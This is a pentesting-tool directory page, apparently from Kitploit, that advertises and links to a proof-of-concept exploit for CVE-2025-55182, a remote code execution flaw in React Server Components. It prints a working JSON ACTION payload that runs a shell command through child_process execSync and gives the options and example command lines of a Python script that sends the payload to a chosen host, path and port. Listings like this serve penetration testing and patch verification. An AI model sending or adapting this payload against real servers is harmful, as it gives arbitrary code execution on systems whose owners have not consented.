Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-55182POC | Kitploit
Tools/GitHubGitHub/sudo-yangziran/cve-2025-55182poc
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubsudo-yangziran/cve-2025-55182poc

CVE-2025-55182POC

View Repository
28 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-55182 React Server Components RCE POC

This project is a CVE-2025-55182 - React Server Components (RSC) RCE Proof of Concept, demonstrating remote code execution triggered under specific conditions via vm.runInThisContext and malicious ACTION payload.

  • Python side: Automates sending malicious ACTION payload and parsing response

⚠ Vulnerability Overview (CVE-2025-55182)

React Server Components' ACTION payload under certain conditions will:

  • Be deserialized into JS object
  • Enter vm.runInThisContext for execution
  • Be automatically injected into server actions

An attacker can craft payload:

root@kitploit:~
{
  "$ACTION_REF_0": "",
  "$ACTION_0:0": "{\"id\": \"vm#runInThisContext\", \"bound\": [\"global.process.mainModule.require('child_process').execSync('calc').toString()\"]}"
}
ParameterRequiredDefaultDescription
--hostYesNoneTarget server IP or domain. E.g.: 127.0.0.1, 192.168.1.10, example.com
--portNo80Target HTTP service port, e.g.: 3003
--pathYesNoneTarget route path that triggers the vulnerability, e.g.: /feedback, /action
--httpsNoFalseWhether to use HTTPS to send payload (default HTTP)

python a.py --host --port --path

python a.py --host 127.0.0.1 --port 3003 --path /feedback

Download Tool